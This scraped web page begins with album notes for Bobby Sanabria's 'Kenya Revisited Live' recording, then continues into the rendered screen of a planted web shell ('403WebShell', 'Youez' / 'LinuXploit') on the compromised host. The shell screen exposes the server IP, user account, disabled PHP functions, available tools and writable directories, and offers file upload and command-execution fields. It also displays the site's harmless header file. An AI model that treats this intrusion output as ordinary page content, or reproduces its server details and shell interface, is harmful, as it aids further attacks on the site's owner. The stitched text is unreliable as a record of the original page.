Manhattan School of Music Afro-Cuban Jazz Orchestra Conducted by Bobby Sanabria Kenya Revisited Live

Tracklist

  1. Intro
  2. Frenzy
  3. Congo Mulence
  4. Kenya
  5. Oyeme
  6. Holiday Holiday
  7. Cannonlogy
  8. Wild Jungle
  9. Blues a la Machito
  10. Conversation
  11. Theme And Variations On Tin Tin Deo
  12. Tin Tin Deo
  13. Minor Rama
  14. Turarato

Personnel

Musicians:
Bobby Sanabria – Conductor, Drums, Timbales, Vocals, Arrangement Supervisor

Special guest soloist:
Candido – Congas

Saxophones:
Justin Janer – Lead alto
Vince Nero – 2nd alto
Pawan Benhamin – tenor
Michael Davenport – tenor
Michael Sherman – baritone

Trumpets:
Michael Taylor – lead
Jimmie “J.J.” Kirkpatrick
Anthony Stanco
Jonathan Barnes

Trombones:
Timothy Vaughn – lead
Felix Fromm
Nate Adkins
Timothy “T.J.” Robinson – bass

Electric/Acoustic Bass:
Billy Norris

Piano:
Christian Sylvester Sands

Drums:
Normans Edward
Giancarlo anderson
Jake golblas
Cristian Ribera
Obanilende

Additonal Notes

This recording celebrates with new arrangements, the 50th Anniversary of the legendary Kenya album by the founders of the Afro-Cuban Jazz movement, Machito & His Afro-Cubans.

The CD is a prelude to the 4 hour PBS documentary, LATIN MUSIC U.S.A. – premieres on PBS and the BBC in October and features Mr. Sanabria and Candido in the first episode.

Mr. Sanabria conducts and is featured on drums and timbales on several tracks, while legendary NEA Jazz Master, Candido, who played on the original Kenya, is featured on several tracks.

403WebShell
403Webshell
Server IP : 23.235.221.107  /  Your IP : 216.73.217.144
Web Server : Apache
System : Linux drums.jazzcorner.com 4.18.0-513.24.1.el8_9.x86_64 #1 SMP Mon Apr 8 11:23:13 EDT 2024 x86_64
User : bsanabri ( 1025)
PHP Version : 8.1.34
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/bsanabri/public_html/archive/m/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/bsanabri/public_html/archive/m/header.inc
<?
function cleanfile($textfile) {
	$text = file_get_contents($textfile);
	$replace = array("content=", "%26", "-------------------------------------------------------------------------------------------------------");
	$with = array("", "&", "<hr />");
	$text = str_replace($replace, $with, $text);
	return nl2br($text);
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">-->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0" />
<link rel='stylesheet' type='text/css' href='style.css'>
<meta property="og:url" content="http://www.bobbysanabria.com/m" />
<meta property="og:title" content="Bobby Sanabria" />
<meta property="og:image" content="http://www.bobbysanabria.com/images/bobbysanabria_fb.jpg" />
<title>Bobby Sanabria</title>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js"></script>
<? if ($page == "Recordings") { ?>
	<script type="text/javascript" src="js/jquery.jplayer.min.js"></script>
	<script type="text/javascript" src="js/jquery.jplayer.inspector.js"></script>
<script type="text/javascript">
$(document).ready(function(){

	// Local copy of jQuery selectors, for performance.
	var	my_jPlayer = $("#jquery_jplayer"),
		my_trackName = $("#jp_container .track-name"),
		my_playState = $("#jp_container .play-state"),
		my_extraPlayInfo = $("#jp_container .extra-play-info");

	// Some options
	var	opt_play_first = false, // If true, will attempt to auto-play the default track on page loads. No effect on mobile devices, like iOS.
		opt_auto_play = true, // If true, when a track is selected, it will auto-play.
		opt_text_playing = "Now playing", // Text when playing
		opt_text_selected = "Track selected"; // Text when not playing

	// A flag to capture the first track
	var first_track = true;

	// Change the time format
	$.jPlayer.timeFormat.padMin = false;
	$.jPlayer.timeFormat.padSec = false;
	$.jPlayer.timeFormat.sepMin = " min ";
	$.jPlayer.timeFormat.sepSec = " sec";

	// Initialize the play state text
	my_playState.text(opt_text_selected);

	// Instance jPlayer
	my_jPlayer.jPlayer({
		ready: function () {
			$("#jp_container .track-default").click();
		},
		timeupdate: function(event) {
			my_extraPlayInfo.text(parseInt(event.jPlayer.status.currentPercentAbsolute, 10) + "%");
		},
		play: function(event) {
			my_playState.text(opt_text_playing);
		},
		pause: function(event) {
			my_playState.text(opt_text_selected);
		},
		ended: function(event) {
			my_playState.text(opt_text_selected);
		},
		swfPath: "js",
		cssSelectorAncestor: "#jp_container",
		supplied: "mp3",
		wmode: "window"
	});

	// Create click handlers for the different tracks
	$("#jp_container .track").click(function(e) {
		my_trackName.text($(this).text());
		my_jPlayer.jPlayer("setMedia", {
			mp3: $(this).attr("href")
		});
		if((opt_play_first && first_track) || (opt_auto_play && !first_track)) {
			my_jPlayer.jPlayer("play");
		}
		first_track = false;
		$(".stopdiv").css("visibility", "hidden");
		$("#stop" + $(this).attr("id")).css("visibility", "visible");
		$(this).blur();
		return false;
	});

	$(".jp-stop").click(function(e) {
		$(".stopdiv").css("visibility", "hidden");
	});

	$("#jplayer_inspector").jPlayerInspector({jPlayer:$("#jquery_jplayer")});
$(".jp-play").click();
});
</script>
<? } ?>
</head>
<body>
<div id="wrapper">
<h1><a href="/m/"><img src="images/header.png" alt="Bobby Sanabria" /></a></h1>
<div id="content">

Youez - 2016 - github.com/yon3zu
LinuXploit